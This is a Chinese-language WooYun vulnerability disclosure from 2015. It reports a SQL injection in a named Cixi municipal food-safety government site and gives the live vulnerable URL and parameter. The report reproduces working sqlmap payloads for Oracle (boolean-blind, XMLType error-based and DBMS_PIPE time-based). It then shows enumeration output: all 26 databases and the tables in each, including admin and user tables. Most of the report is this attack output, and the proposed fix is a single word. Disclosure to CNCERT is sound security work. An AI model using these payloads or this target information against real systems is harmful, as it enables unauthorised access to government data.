浙江某市某系统存在SQL注射oracle数据库

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096148

漏洞标题：浙江某市某系统存在SQL注射oracle数据库

漏洞作者：路人甲

提交时间：2015-02-10 16:11

修复时间：2015-03-27 16:12

公开时间：2015-03-27 16:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-10：细节已通知厂商并且等待厂商处理中
2015-02-13：厂商已经确认，细节仅向厂商公开
2015-02-23：细节向核心白帽子及相关领域专家公开
2015-03-05：细节向普通白帽子公开
2015-03-15：细节向实习白帽子公开
2015-03-27：细节向公众公开

简要描述：

浙江某市某系统存在SQL注射

详细说明：

慈溪市食品安全信息网商品准入系统
大量信息
搞不懂一个asp站竟然搭载了一个oracle数据库

http://www.cxaic.gov.cn/xgwj/xgwj_show.asp?id=2

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 4468=4468
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=2 AND 1494=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (1494=1494) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=2 AND 3118=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(78)||CHR(75)||CHR(82),5)
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Oracle

back-end DBMS: Oracle
available databases [26]:
[*] CTXSYS
[*] CXFOOD
[*] CXHD
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
Database: WKSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| WK$CHARSET                  | 57      |
| WK$CRAWLER_CONFIG_DEFAULT   | 38      |
| WK$MIMETYPES                | 35      |
| WK$LANG                     | 14      |
| WK$SYS_CONFIG               | 1       |
+-----------------------------+---------+
Database: QS_OS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_OS_ORDERS_MQTAB_S    | 1       |
| AQ$_QS_OS_ORDERS_PR_MQTAB_S | 1       |
+-----------------------------+---------+
Database: ORDSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ORD_CARTRIDGE_COMPONENTS    | 86      |
| JACCELERATOR$DLLS           | 14      |
| ORD_INSTALLATIONS           | 1       |
+-----------------------------+---------+
Database: HR
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| EMPLOYEES                   | 107     |
| DEPARTMENTS                 | 27      |
| COUNTRIES                   | 25      |
| LOCATIONS                   | 23      |
| JOBS                        | 19      |
| JOB_HISTORY                 | 10      |
| REGIONS                     | 4       |
+-----------------------------+---------+
Database: OLAPSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CWM$ITEMUSE                 | 118     |
| CWM$LEVELATTRIBUTE          | 67      |
| CWM$CLASSIFICATIONENTRY     | 66      |
| CWM$ITEMMAP                 | 59      |
| CWM$LEVEL                   | 27      |
| CWM$CLASSIFICATION          | 24      |
| CWM$DIMENSIONATTRIBUTE      | 23      |
| CWM$DOMAIN                  | 21      |
| CWM$FUNCTION                | 13      |
| CWM$CLASSIFICATIONTYPE      | 10      |
| CWM$OBJECTTYPE              | 10      |
| CWM$CUBEDIMENSIONUSE        | 7       |
| CWM$FACTLEVELUSE            | 7       |
| CWM$HIERARCHY               | 7       |
| CWM$DIMENSION               | 5       |
| CWM$PARAMETER               | 5       |
| CWM$FACTUSE                 | 4       |
| CWM$FUNCTIONUSE             | 4       |
| CWM$MEASURE                 | 4       |
| CWM$MEASUREDIMENSIONUSE     | 4       |
| CWM$MODEL                   | 3       |
| CWM$PROJECT                 | 3       |
| CWM$CUBE                    | 2       |
| CWM$FACTLEVELGROUP          | 2       |
| CWM$FACTTABLEMAP            | 2       |
+-----------------------------+---------+
Database: XDB
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| XDB$H_INDEX                 | 12      |
| XDB$ROOT_INFO               | 1       |
+-----------------------------+---------+
Database: QS_CS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_CS_ORDER_STATUS_QT_S | 1       |
+-----------------------------+---------+
Database: MDSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CS_SRS                      | 1000    |
| SDO_DATUMS                  | 118     |
| MD$RELATE                   | 90      |
| SDO_DIST_UNITS              | 54      |
| SDO_AREA_UNITS              | 48      |
| SDO_ELLIPSOIDS              | 47      |
| SDO_PROJECTIONS             | 42      |
| SDO_ANGLE_UNITS             | 12      |
+-----------------------------+---------+
Database: ODM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ODM_ERROR_TABLE             | 342     |
| ODM_CONFIGURATION           | 25      |
| ODM_INTERNAL_CONFIGURATION  | 19      |
| ODM_PMML_DTD                | 1       |
+-----------------------------+---------+
Database: QS_CBADM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_CBADM_ORDERS_MQTAB_S | 3       |
+-----------------------------+---------+
Database: CTXSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| DR$STOPWORD                 | 152     |
| DR$OBJECT_ATTRIBUTE         | 135     |
| DR$OBJECT_ATTRIBUTE_LOV     | 106     |
| DR$SECTION                  | 103     |
| DR$INDEX_VALUE              | 80      |
| DR$OBJECT                   | 44      |
| DR$PREFERENCE               | 31      |
| DR$PARAMETER                | 27      |
| DR$PREFERENCE_VALUE         | 15      |
| DR$CLASS                    | 11      |
| DR$INDEX_OBJECT             | 9       |
| DR$SECTION_GROUP            | 6       |
| DR$STOPLIST                 | 3       |
| DR$SUB_LEXER                | 3       |
| DR$INDEX                    | 1       |
| DR$INDEX_SET                | 1       |
+-----------------------------+---------+
Database: QS_ES
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_ES_ORDERS_MQTAB_S    | 1       |
| AQ$_QS_ES_ORDERS_PR_MQTAB_S | 1       |
+-----------------------------+---------+
Database: PM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ONLINE_MEDIA                | 9       |
| PRINT_MEDIA                 | 4       |
+-----------------------------+---------+
Database: RMAN
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CONFIG                      | 1       |
| RCVER                       | 1       |
+-----------------------------+---------+
Database: QS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_AQ$_MEM_MC_S            | 1       |
| AQ$_QS_ORDERS_PR_MQTAB_S    | 1       |
+-----------------------------+---------+
Database: ODM_MTR
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| MAGAZINE_2D_BUILD_BINNED    | 6012    |
| EIGHT_CLOUDS_APPLY_UNBINNED | 4000    |
| EIGHT_CLOUDS_BUILD_UNBINNED | 4000    |
| MARKET_BASKET_TX_BINNED     | 3800    |
| CENSUS_2D_BUILD_BINNED      | 2940    |
| CENSUS_2D_BUILD_UNBINNED    | 2940    |
| MAGAZINE_2D_TEST_BINNED     | 2613    |
| CENSUS_2D_APPLY_BINNED      | 1226    |
| CENSUS_2D_APPLY_UNBINNED    | 1226    |
| MARKET_BASKET_2D_BINNED     | 1000    |
| CENSUS_2D_TEST_BINNED       | 834     |
| CENSUS_2D_TEST_UNBINNED     | 834     |
+-----------------------------+---------+
Database: QS_WS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_WS_ORDERS_MQTAB_S    | 5       |
| AQ$_QS_WS_ORDERS_PR_MQTAB_S | 1       |
+-----------------------------+---------+
Database: OE
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| PRODUCT_DESCRIPTIONS        | 8640    |
| INVENTORIES                 | 1112    |
| ORDER_ITEMS                 | 665     |
| CUSTOMERS                   | 319     |
| PRODUCT_INFORMATION         | 288     |
| ORDERS                      | 105     |
| WAREHOUSES                  | 9       |
+-----------------------------+---------+
Database: SYSTEM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| HELP                        | 918     |
| LOGSTDBY$SKIP_SUPPORT       | 74      |
| AQ$_QUEUES                  | 40      |
| MVIEW$_ADV_PARAMETERS       | 40      |
| REPCAT$_OBJECT_TYPES        | 28      |
| REPCAT$_RESOLUTION_METHOD   | 19      |
| AQ$_QUEUE_TABLES            | 17      |
| REPCAT$_TEMPLATE_STATUS     | 3       |
| REPCAT$_AUDIT_ATTRIBUTE     | 2       |
| REPCAT$_TEMPLATE_TYPES      | 2       |
+-----------------------------+---------+
Database: SYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| SOURCE$                     | 152856  |
| DEPENDENCY$                 | 50252   |
| ARGUMENT$                   | 47847   |
| ACCESS$                     | 43428   |
| COL$                        | 35351   |
| IDL_UB1$                    | 32748   |
| OBJ$                        | 30248   |
| TEST                        | 29636   |
| IDL_SB4$                    | 19215   |
| IDL_UB2$                    | 17051   |
| OBJAUTH$                    | 13923   |
| IDL_CHAR$                   | 12526   |
| SYN$                        | 11560   |
| PROCEDUREINFO$              | 10422   |
| COM$                        | 7148    |
| JAVASNM$                    | 6607    |
| SETTINGS$                   | 4316    |
| CCOL$                       | 3430    |
| ATTRIBUTE$                  | 3336    |
| CON$                        | 3136    |
| CDEF$                       | 3135    |
| SEG$                        | 2655    |
| VIEW$                       | 2541    |
| PARAMETER$                  | 2531    |
| ICOL$                       | 1923    |
| SMON_SCN_TIME               | 1440    |
| IND$                        | 1361    |
| PROCEDURE$                  | 1315    |
| ATTRCOL$                    | 1124    |
| COLTYPE$                    | 1103    |
| OID$                        | 1070    |
| SYSAUTH$                    | 1057    |
| METHOD$                     | 1036    |
| TAB$                        | 925     |
| TYPE$                       | 851     |
| TYPE_MISC$                  | 843     |
| VTABLE$                     | 759     |
| RESULT$                     | 696     |
| HIST_HEAD$                  | 536     |
| HS$_BASE_CAPS               | 490     |
| PROCEDUREJAVA$              | 434     |
| LOB$                        | 366     |
| COL_USAGE$                  | 319     |
| PROCEDUREC$                 | 234     |
| METAFILTER$                 | 220     |
| COLLECTION$                 | 207     |
| TRIGGERCOL$                 | 193     |
| STMT_AUDIT_OPTION_MAP       | 167     |
| SEQ$                        | 157     |
| SYSTEM_PRIVILEGE_MAP        | 157     |
| AUDIT_ACTIONS               | 144     |
| TYPED_VIEW$                 | 136     |
| INDPART$                    | 128     |
| NTAB$                       | 121     |
| TRIGGER$                    | 121     |
| HS$_BASE_DD                 | 102     |
| OPARG$                      | 101     |
| LIBRARY$                    | 90      |
| METAXSLPARAM$               | 84      |
| JAVA$POLICY$                | 77      |
| EXPDEPACT$                  | 73      |
| DIMATTR$                    | 71      |
| METAVIEW$                   | 70      |
| NOEXP$                      | 66      |
| USER$                       | 64      |
| REFCON$                     | 61      |
| PARTCOL$                    | 60      |
| PARTOBJ$                    | 60      |
| METASTYLESHEET              | 58      |
| BOOTSTRAP$                  | 57      |
| EXPDEPOBJ$                  | 57      |
| METAXSL$                    | 57      |
| PS$                         | 55      |
| TABPART$                    | 55      |
| TYPEHIERARCHY$              | 48      |
| OPBINDING$                  | 40      |
| LOGMNR_INTERESTING_COLS     | 34      |
| INDOP$                      | 33      |
| HIERLEVEL$                  | 31      |
| OPQTYPE$                    | 29      |
| OPERATOR$                   | 28      |
| DIMLEVEL$                   | 27      |
| DIMLEVELKEY$                | 27      |
| SUBCOLTYPE$                 | 27      |
| TSQ$                        | 27      |
| UTL_RECOMP_COMPILED         | 26      |
| PROPS$                      | 25      |
| TABLE_PRIVILEGE_MAP         | 23      |
| EXPPKGACT$                  | 21      |
| UNDO$                       | 21      |
| JACCELERATOR$DLLS           | 19      |
| RLS$                        | 18      |
| AQ$_QUEUE_TABLE_AFFINITIES  | 17      |
| EXPACT$                     | 17      |
| PROFILE$                    | 17      |
| RESOURCE_MAP                | 16      |
| REGISTRY$                   | 15      |
| RULE_SET$                   | 15      |
| OPANCILLARY$                | 14      |
| TS$                         | 14      |
| FILE$                       | 12      |
| OLAP$ALTER_SESSION          | 11      |
| RULE_EC$                    | 11      |
| CLU$                        | 10      |
| REC_TAB$                    | 10      |
| RESOURCE_COST$              | 10      |
| EXPPKGOBJ$                  | 9       |
| ICOLDEP$                    | 9       |
| INDTYPES$                   | 9       |
| USER_ASTATUS_MAP            | 9       |
| DUC$                        | 8       |
| ASSOCIATION$                | 7       |
| HIER$                       | 7       |
| RESOURCE_PLAN_DIRECTIVE$    | 6       |
| DIM$                        | 5       |
| SNAP_LOGDEP$                | 5       |
| SNAP_REFTIME$               | 5       |
| SUMDEP$                     | 5       |
| SUMDETAIL$                  | 5       |
| SUMKEY$                     | 5       |
| RESOURCE_CONSUMER_GROUP$    | 4       |
| SQL_VERSION$                | 4       |
| SUMPRED$                    | 4       |
| DIR$                        | 3       |
| JAVA$POLICY$SHARED$TABLE    | 3       |
| RESOURCE_PLAN$              | 3       |
| SNAP_LOADERTIME$            | 3       |
| SUMJOIN$                    | 3       |
| AW$                         | 2       |
| CONTEXT$                    | 2       |
| REC_VAR$                    | 2       |
| REG_SNAP$                   | 2       |
| SNAP$                       | 2       |
| SUM$                        | 2       |
| SUMAGG$                     | 2       |
| TRIGGERJAVAC$               | 2       |
| TRIGGERJAVAF$               | 2       |
| TRIGGERJAVAM$               | 2       |
| TRIGGERJAVAS$               | 2       |
| "DUAL"                      | 1       |
| AURORA$SHUTDOWN$CLASSES$    | 1       |
| AURORA$STARTUP$CLASSES$     | 1       |
| AW$CWMTOECM                 | 1       |
| AW$EXPRESS                  | 1       |
| CDC_CHANGE_SETS$            | 1       |
| CDC_CHANGE_SOURCES$         | 1       |
| CDC_SYSTEM$                 | 1       |
| DIMJOINKEY$                 | 1       |
| EXTERNAL_LOCATION$          | 1       |
| EXTERNAL_TAB$               | 1       |
| HS$_FDS_CLASS               | 1       |
| HS$_FDS_CLASS_DATE          | 1       |
| ID_GENS$                    | 1       |
| INCVID                      | 1       |
| JAVA$JVM$STATUS             | 1       |
| KOPM$                       | 1       |
| MIGRATE$                    | 1       |
| PROFNAME$                   | 1       |
| SNAP_REFOP$                 | 1       |
| SUPEROBJ$                   | 1       |
| TRUSTED_LIST$               | 1       |
| VIEWTRCOL$                  | 1       |
+-----------------------------+---------+
Database: CXHD
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ZL_SPDJB                    | 87177   |
| ZL_GYS                      | 10034   |
| SB_DJB                      | 8413    |
| ZL_QYNEW                    | 147     |
| SB_JCB                      | 67      |
| ZL_GG                       | 51      |
| SB_QYXX                     | 45      |
| ZL_QYFC                     | 33      |
| ZL_SF                       | 33      |
| SB_USERS                    | 23      |
| ZL_QYGLZD                   | 15      |
| ZL_BM                       | 14      |
| SB_BM                       | 12      |
| ZL_LB                       | 12      |
| ZL_QY                       | 12      |
| HD_ADMIN                    | 11      |
| ZL_PART                     | 8       |
| ZL_USERS                    | 7       |
| SB_PART                     | 6       |
| ZL_XGWJ                     | 5       |
| ZNLB                        | 3       |
+-----------------------------+---------+
Database: SH
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| SALES                       | 1016271 |
| COSTS                       | 787766  |
| FWEEK_PSCAT_SALES_MV        | 149325  |
| CUSTOMERS                   | 50000   |
| PRODUCTS                    | 10000   |
| TIMES                       | 1461    |
| PROMOTIONS                  | 501     |
| CAL_MONTH_SALES_MV          | 35      |
| COUNTRIES                   | 19      |
| CHANNELS                    | 5       |
+-----------------------------+---------+
Database: SCOTT
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| EMP                         | 14      |
| SALGRADE                    | 5       |
| DEPT                        | 4       |
+-----------------------------+---------+
Database: WMSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| WM$WORKSPACE_PRIV_TABLE     | 8       |
| WM$ENV_VARS                 | 1       |
| WM$VERSION_HIERARCHY_TABLE  | 1       |
| WM$WORKSPACES_TABLE         | 1       |
+-----------------------------+---------+
Database: CXFOOD
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| SPJCDJB                     | 2375333 |
| JCCS_TJ                     | 124025  |
| YWZD                        | 4870    |
| DTXX                        | 1500    |
| GUESTBOOK                   | 901     |
| FXDG                        | 795     |
| JCXX                        | 281     |
| HD_ADMIN                    | 194     |
| JCDXX                       | 126     |
| FLFG                        | 85      |
| UTABLE                      | 70      |
| SPQY                        | 68      |
| TZGL                        | 61      |
| JCXM                        | 27      |
| BMLB                        | 16      |
| JCSB                        | 15      |
| XFTS                        | 14      |
| SPZL                        | 13      |
| GGXX                        | 10      |
| MYXX                        | 9       |
| XXLY                        | 7       |
| FLFGLB                      | 4       |
| PART                        | 4       |
| DTXXLB                      | 3       |
| JCLB                        | 3       |
+-----------------------------+---------+

漏洞证明：

如上

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-02-13 09:52

厂商回复：

CNVD确认所述情况，已经转由CNCERT下发给浙江分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096148

漏洞标题：浙江某市某系统存在SQL注射oracle数据库

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-02-10 16:11

修复时间：2015-03-27 16:12

公开时间：2015-03-27 16:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096148

漏洞标题：浙江某市某系统存在SQL注射oracle数据库

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-02-10 16:11

修复时间：2015-03-27 16:12

公开时间：2015-03-27 16:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-096148"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云